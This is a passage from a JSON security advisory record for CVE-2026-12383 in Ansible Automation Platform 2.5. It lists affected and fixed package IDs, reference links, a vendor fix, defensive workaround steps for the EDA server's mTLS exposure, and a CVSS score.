"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-12383"
},
{
"category": "external",
"summary": "RHBZ#2489127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2489127"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-12383",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-12383"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12383"
}
],
"release_date": "2026-07-27T19:04:53.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
},
{
"category": "workaround",
"details": "The following practices would help for avoiding exposure and mitigate this flaw:\n\n- Ensure the EDA server is not directly accessible from untrusted networks; all traffic should route through the AAP Gateway which should perform mTLS validation.\n- If possible, configure network-level access controls to restrict which source IPs can reach the EDA backend API.\n- Monitor EDA event streams for unexpected events_received counter changes.\n- Review and rotate mTLS client certificates if unauthorized access is suspected, as the expected DN may have been leaked via the 403 error response.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
